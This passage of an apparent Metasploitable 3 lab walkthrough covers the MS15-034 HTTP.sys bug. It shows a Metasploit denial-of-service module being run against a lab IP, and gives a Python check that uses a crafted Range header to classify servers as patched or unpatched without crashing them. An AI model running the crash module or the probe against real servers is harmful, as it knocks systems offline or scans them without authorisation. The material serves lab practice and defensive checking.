(4) Port 80: HTTP

MS15-034 / CVE-2015-1635: HTTP.sys remote code execution (the remote blue-screen bug)

It lives in the HTTP.sys kernel driver, so it affects IIS 7.5 and later: Windows 7, 8 and 8.1 and Windows Server 2008 R2, 2012 and 2012 R2 are all vulnerable (Server 2003/IIS 6.0 is not). Note that the dos module used below crashes or reboots the target; outside a lab you would want a non-destructive check first.

msf > search ms15_034

Matching Modules
================

Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/dos/http/ms15_034_ulonglongadd normal MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service
auxiliary/scanner/http/ms15_034_http_sys_memory_dump normal MS15-034 HTTP Protocol Stack Request Handling HTTP.SYS Memory Information Disclosure
msf > use auxiliary/dos/http/ms15_034_ulonglongadd
msf auxiliary(dos/http/ms15_034_ulonglongadd) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf auxiliary(dos/http/ms15_034_ulonglongadd) > show options

Module options (auxiliary/dos/http/ms15_034_ulonglongadd):

Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.56.101 yes The target address range or CIDR identifier
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / no URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)
THREADS 1 yes The number of concurrent threads
VHOST no HTTP server virtual host

msf auxiliary(dos/http/ms15_034_ulonglongadd) >

msf auxiliary(dos/http/ms15_034_ulonglongadd) > run

[*] DOS request sent
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Probably because of the image, after running this I only ever saw a blue screen once; every other time the machine rebooted immediately.
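The dos module sends a request that takes the target down, which is fine on a lab box and not fine anywhere else. The widely used non-destructive check (the same idea behind nmap's http-vuln-cve2015-1635 script) sends a `Range` header whose upper bound is 2^64-1, the value whose addition overflows in HTTP.sys: an unpatched kernel tries to honour it and answers 416 "Requested Range Not Satisfiable", while a patched one rejects the header with 400 and the text "The request has an invalid header name". The code below is an added example of that check (my code, not Metasploit's); the two responses are constructed to match those behaviours and are fed through a fake socket so it runs offline, and the `connect` hook is an assumption of this example, not part of any library.

```python
"""Non-destructive MS15-034 (CVE-2015-1635) check: classify HTTP.sys by how it answers a
Range header that ends at 2**64-1, instead of sending the request that crashes it."""
import socket

# 18446744073709551615 == 2**64 - 1: the upper bound whose handling overflows in HTTP.sys.
RANGE_PROBE = "bytes=0-18446744073709551615"


def build_request(host: str, path: str = "/") -> bytes:
    """Raw HTTP/1.1 request; Connection: close so the read loop ends at EOF."""
    return (
        f"GET {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Range: {RANGE_PROBE}\r\n"
        "Connection: close\r\n\r\n"
    ).encode()


def classify(status: int, body: str) -> str:
    """416: the kernel tried to satisfy the absurd range (unpatched).
    400 + 'invalid header name': the patched driver rejected the header outright."""
    if status == 416:
        return "vulnerable"
    if status == 400 and "invalid header name" in body.lower():
        return "patched"
    return "unknown"


def parse_response(raw: bytes) -> tuple:
    """Split a raw HTTP response into (status code, body); status 0 if nothing parseable."""
    head, _, body = raw.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].split(b" ", 2)
    status = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else 0
    return status, body.decode(errors="replace")


def check_ms15_034(host: str, port: int = 80, path: str = "/", connect=None) -> str:
    """connect(host, port) returns a socket-like object (sendall/recv/close); defaults to TCP."""
    connect = connect or (lambda h, p: socket.create_connection((h, p), timeout=5))
    sock = connect(host, port)
    chunks = []
    try:
        sock.sendall(build_request(host, path))
        while True:
            try:
                data = sock.recv(4096)
            except socket.timeout:      # server kept the connection open: classify what we have
                break
            if not data:
                break
            chunks.append(data)
    finally:
        sock.close()
    return classify(*parse_response(b"".join(chunks)))


# --- Constructed responses (modelled on the two documented behaviours) and a fake socket.
VULNERABLE_RESPONSE = (b"HTTP/1.1 416 Requested Range Not Satisfiable\r\n"
                       b"Content-Type: text/html\r\nConnection: close\r\n\r\n"
                       b"<h1>Requested Range Not Satisfiable</h1>")
PATCHED_RESPONSE = (b"HTTP/1.1 400 Bad Request\r\n"
                    b"Content-Type: text/html\r\nConnection: close\r\n\r\n"
                    b"<h1>Bad Request</h1>The request has an invalid header name")


class FakeSocket:
    """Records what was sent and replays a canned response; no network involved."""

    def __init__(self, response: bytes):
        self.response, self.sent = response, b""

    def sendall(self, data: bytes) -> None:
        self.sent += data

    def recv(self, n: int) -> bytes:
        chunk, self.response = self.response[:n], self.response[n:]
        return chunk

    def close(self) -> None:
        pass


def fake_connect(response: bytes):
    return lambda host, port: FakeSocket(response)


if __name__ == "__main__":
    for label, resp in (("unpatched", VULNERABLE_RESPONSE), ("patched", PATCHED_RESPONSE)):
        print(label, "->", check_ms15_034("192.168.56.101", connect=fake_connect(resp)))
```

Against the lab box, `check_ms15_034("192.168.56.101")` with the default connector sends a single request and leaves the machine up; only once it says "vulnerable" is there any reason to reach for the dos module.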

References:

Material on Metasploitable 3:

Metasploitable 3 officially released, with a global CTF (freebuf.com)

rapid7/metasploitable3 (github.com)

Since installation is fiddly, here is a pre-built image:

Link: pan.baidu.com/s/18w23GS  extraction code: xmyf